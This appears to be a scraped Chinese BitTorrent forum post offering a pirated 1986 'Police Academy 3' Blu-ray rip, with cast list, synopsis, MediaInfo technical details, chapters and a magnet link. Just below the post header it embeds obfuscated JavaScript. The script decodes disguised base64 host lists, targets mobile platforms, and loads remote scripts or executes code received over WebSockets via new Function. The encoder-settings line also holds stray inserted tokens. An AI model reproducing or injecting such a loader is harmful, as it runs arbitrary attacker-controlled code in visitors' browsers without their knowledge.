警察学校3:初为人师[双语字幕]Police.Academy.3.Back.in.Training.1986.1080p.BluRay.x264.DTS.1.0-迅雷下载 7.81GB

版主小s 28天前 200

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 警察学校3:初为人师/回到学堂/金牌警校军第三集

◎片 名 Police Academy 3: Back in Training

◎年 代 1986

◎产 地 美国

◎类 别 喜剧 / 犯罪

◎语 言 英语

◎上映日期 1986-03-21

◎豆瓣评分 7.1/10 from 2095 users

◎豆瓣链接 https://movie.douban.com/subject/1300595/

◎片 长 83分钟

◎导 演 杰里·帕里斯 Jerry Paris

◎编 剧 帕特·普罗夫特 Pat Proft / 尼尔·伊斯雷尔 Neal Israel

◎主 演 斯蒂夫·古根伯格 Steve Guttenberg

布巴·史密斯 Bubba Smith

大卫格拉夫 David Graf

迈克尔·温斯洛 Michael Winslow

马里昂·拉姆塞 Marion Ramsey

莱斯利·伊斯特布鲁克 Leslie Easterbrook

阿特·梅特拉诺 Art Metrano

蒂姆·卡祖林斯基 Tim Kazurinsky

博卡·格德斯维特 Bobcat Goldthwait

乔治·盖恩斯 George Gaynes

肖恩·威瑟利 Shawn Weatherly

斯科特·汤姆森 Scott Thomson

Bruce Mahler Bruce Mahler

艾德·尼尔森 Ed Nelson

大卫·詹姆斯·艾略特 David James Elliott

德布拉里·斯科特 Debralee Scott

Rita Tuckett Rita Tuckett

Brian Tochi Brian Tochi

兰斯·金赛 Lance Kinsey

乔治·R·罗伯逊 George R. Robertson

亚瑟拜坦德斯 Arthur Batanides

Jack Creley Jack Creley

Grant Cowan Grant Cowan

Jean Frenette Jean Frenette

Theo Caesar Theo Caesar

乔治娜·斯派温 Georgina Spelvin

Alex Pauljuk Alex Pauljuk

Andrew Paris Andrew Paris

◎标 签 喜剧 | 美国 | 美国电影 | 警察学校 | 经典 | 搞笑 | 1986 | 电影

◎简 介

州政府为节省财务开支,计划把分别由拉萨雷和毛瑟所领导的两所警校撤销一所,为了从生存竞争中胜出,两位校长各施所能,毛瑟在州长与学监面前大拍马屁,并且暗中在拉萨雷警校中安插了两名内线;而拉萨雷则召回了昔日优秀学生担任教官助阵,于是马哈尼(斯蒂夫?古根伯格 Steve Guttenberg 饰)、黑巨人高塔、泰克布雷等六人再次回到警校。毛瑟为了获胜,将看不顺眼的学员赶到拉萨雷处,很快,一班古怪学员汇聚拉萨雷警校:从上一集中出现的懦弱眼镜男和流氓头子,到精通空手道的日本交换生应有尽有。马哈尼等人必须在短期内将学员们打造成合格的警察,但这个任务并不简单,除了学员本身的素质限制,毛瑟一伙也在暗中破坏……

  1. General

  2. Unique ID : 20625783962864732497090942744499923278 (0xF8461A9B9B4DD32384393853775294E)

  3. Complete name : Police.Academy.3.Back.in.Training.1986.1080p.BluRay.x264.DTS.1.0-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.80 GiB

  7. Duration : 1 h 23 min

  8. Overall bit rate : 13.3 Mb/s

  9. Movie name : Police Academy 3 Back in Training 1986

  10. Encoded date : UTC 2021-07-04 04:57:36

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 23 min

  25. Bit rate : 12.5 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.251

  36. Stream size : 7.31 GiB (94%)

  37. Writing library : x264 core 161 r3018+53 18a1d6c t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=9 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 23 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 1 channel

  52. Channel layout : C

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 460 MiB (6%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4621 (0x120D)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 19 min

  70. Bit rate : 45.4 kb/s

  71. Count of elements : 1601

  72. Stream size : 25.6 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4622 (0x120E)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 19 min

  86. Bit rate : 42.6 kb/s

  87. Count of elements : 1601

  88. Stream size : 24.1 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4623 (0x120F)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 19 min

  102. Bit rate : 22.5 kb/s

  103. Count of elements : 1601

  104. Stream size : 12.7 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : Yes

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4624 (0x1210)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 19 min

  118. Bit rate : 21.6 kb/s

  119. Count of elements : 1601

  120. Stream size : 12.2 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : Yes

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4609 (0x1201)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 22 min

  134. Bit rate : 34.5 kb/s

  135. Count of elements : 2210

  136. Stream size : 20.3 MiB (0%)

  137. Language : English

  138. Default : Yes

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:03.524 : Chapter 02

  144. 00:11:20.179 : Chapter 03

  145. 00:14:20.401 : Chapter 04

  146. 00:20:58.340 : Chapter 05

  147. 00:24:23.170 : Chapter 06

  148. 00:27:21.514 : Chapter 07

  149. 00:31:02.443 : Chapter 08

  150. 00:34:17.555 : Chapter 09

  151. 00:36:36.611 : Chapter 10

  152. 00:38:13.624 : Chapter 11

  153. 00:42:37.763 : Chapter 12

  154. 00:45:34.773 : Chapter 13

  155. 00:47:51.743 : Chapter 14

  156. 00:51:00.766 : Chapter 15

  157. 00:55:35.957 : Chapter 16

  158. 00:57:12.804 : Chapter 17

  159. 01:02:02.343 : Chapter 18

  160. 01:06:12.051 : Chapter 19

  161. 01:11:43.507 : Chapter 20

  162. 01:14:02.855 : Chapter 21

  163. 01:20:05.008 : Chapter 22


TAGS 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:F01D0B15670F315E214EC2D35F2DAA9FE1B4025D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回